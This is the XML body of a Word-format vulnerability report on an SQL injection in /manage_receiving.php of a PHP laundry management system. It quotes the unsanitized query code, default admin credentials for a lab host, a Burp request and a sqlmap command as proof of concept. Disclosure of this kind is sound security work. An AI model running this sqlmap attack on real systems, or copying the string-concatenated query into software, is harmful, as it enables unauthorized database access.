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39AD" w14:textId="55446E12" w:rsidR="001F7D8F" w:rsidRPr="00CD2FC4" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Online Laundry Management System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>SQL Injection on /</w:t>
      </w:r>
      <w:r w:rsidR="00C22EBC" w:rsidRPr="00C22EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>manage_receiving</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103991AC" w14:textId="77777777" w:rsidR="00243F82" w:rsidRPr="00243F82" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00243F82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vendor Homepage:</w:t>
      </w:r>
      <w:r w:rsidR="00243F82" w:rsidRPr="00243F82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971FC5D" w14:textId="36609020" w:rsidR="001F7D8F" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:r>
        <w:t>https://www.campcodes.com/downloads/online-laundry-management-system-source-code/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1274C5C2" w14:textId="7596D46F" w:rsidR="001F7D8F" w:rsidRPr="00BF16DD" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Version:</w:t>
      </w:r>
      <w:r w:rsidR="00243F82" w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>V1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D3657E" w14:textId="09B568FB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Tested on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251B0F4" w14:textId="19FCDDA6" w:rsidR="00CD2FC4" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:r>
        <w:t>PHP, Apache, MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2737F8" w14:textId="0F890E19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Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062C444" w14:textId="77777777" w:rsidR="001F7D8F" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:r>
        <w:t>http://192.168.150.131/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58103327" w14:textId="77777777" w:rsidR="001F7D8F" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C6D7F" w14:textId="7D64D924" w:rsidR="001F7D8F" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:r>
        <w:t>admin123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904FAF8" w14:textId="087324D9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Affected Page:</w:t>
      </w:r>
      <w:r w:rsidR="00EE459E" w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0043781F" w:rsidRPr="0043781F">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/manage_receiving.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1CE18C" w14:textId="32C5A921" w:rsidR="001F7D8F" w:rsidRDefault="0043781F" w:rsidP="001F7D8F">
      <w:r w:rsidRPr="0043781F">
        <w:t>The potential injection point is located in `manage_receiving.php`. This file directly utilizes the `$id` variables to construct a database query without employing parameterized queries or proper data sanitization measures</w:t>
      </w:r>
      <w:r w:rsidR="001F7D8F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC8DE5" w14:textId="77777777" w:rsidR="00BF16DD" w:rsidRDefault="00BF16DD" w:rsidP="001F7D8F"/>
    <w:p w14:paraId="5011B0B3" w14:textId="53A032C7" w:rsidR="001F7D8F" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:r>
        <w:t># /manage_</w:t>
      </w:r>
      <w:r w:rsidR="0043781F" w:rsidRPr="0043781F">
        <w:t>receiving</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29272F3A" w14:textId="7D4E3AAB" w:rsidR="00460432" w:rsidRPr="00460432" w:rsidRDefault="00460432" w:rsidP="0046043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460432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460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>isset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$_GET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460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'id'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])){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$conn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460432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460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"SELECT * FROM receiving_list where id="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$_GET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460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'id'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])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460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fetch_array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60432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>foreach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$qry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770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as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$k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=&gt;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$val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$$k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$val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$inv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$conn</w:t>
      </w:r>
      <w:r w:rsidRPr="00460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>query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460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"SELECT * FROM inventory where type=1 and form_id="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460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="0055AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>$_GET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[</w:t>
      </w:r>
      <w:r w:rsidRPr="00460432">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'id'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t>]);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460432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731B23A2" w14:textId="77777777" w:rsidR="00460432" w:rsidRDefault="00460432" w:rsidP="001F7D8F"/>
    <w:p w14:paraId="74D50DE7" w14:textId="5F4B9EE2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Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A460C5" w14:textId="648E4624" w:rsidR="001F7D8F" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F">
      <w:r>
        <w:t>Burp Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E821E4E" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>GET /manage_receiving.php?id=1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D1817D" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Host: 192.168.150.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5061424B" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3925B1" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167C71A" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>DNT: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754DF514" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFE8CA" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F527635" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DAD83" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4667C3" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47077044" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Cookie: PHPSESSID=vti3ovjgtr57ia1sal7i2smkv7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036AC509" w14:textId="77777777" w:rsidR="00685A1E" w:rsidRDefault="00685A1E" w:rsidP="00685A1E">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DC3E5" w14:textId="77777777" w:rsidR="001F7D8F" w:rsidRDefault="001F7D8F" w:rsidP="001F7D8F"/>
    <w:p w14:paraId="249DE7E4" w14:textId="50D4A6C0" w:rsidR="00BF16DD" w:rsidRPr="00BF16DD" w:rsidRDefault="00BF16DD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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF16DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCC5B82" w14:textId="03908BB5" w:rsidR="001F7D8F" w:rsidRDefault="00685A1E" w:rsidP="001F7D8F">
      <w:r w:rsidRPr="00685A1E">
        <w:t>python3 sqlmap.py -r 1.txt --current-user --batch --dbms mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF59DF" w14:textId="090DE3A1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Screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00BF16DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD21F38" w14:textId="78446456" w:rsidR="00704A08" w:rsidRDefault="005F2654" w:rsidP="001F7D8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A53DF2D" wp14:editId="68F18DA7">
            <wp:extent cx="5274310" cy="1871980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="494976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8"/>
    <w:rsid w:val="00030458"/>
    <w:rsid w:val="000411AC"/>
    <w:rsid w:val="001A303C"/>
    <w:rsid w:val="001F7D8F"/>
    <w:rsid w:val="00243F82"/>
    <w:rsid w:val="003D2FD1"/>
    <w:rsid w:val="0043781F"/>
    <w:rsid w:val="00460432"/>
    <w:rsid w:val="004B36E0"/>
    <w:rsid w:val="004D7BE6"/>
    <w:rsid w:val="005F2654"/>
    <w:rsid w:val="00685A1E"/>
    <w:rsid w:val="00704A08"/>
    <w:rsid w:val="0072391F"/>
    <w:rsid w:val="00A87A7A"/>
    <w:rsid w:val="00BF16DD"/>
    <w:rsid w:val="00C22EBC"/>
    <w:rsid w:val="00CD2FC4"/>
    <w:rsid w:val="00D00C19"/>
    <w:rsid w:val="00EE459E"/>
    <w:rsid w:val="00FA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9C2C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9D828737-2F97-4417-94A3-CAFA8DB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0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0432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460432"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable-2">
    <w:name w:val="cm-variable-2"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00460432"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
    <w:name w:val="cm-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00460432"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-operator">
    <w:name w:val="cm-operator"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00460432"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable">
    <w:name w:val="cm-variable"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0046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15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-27T01:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-27T01:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>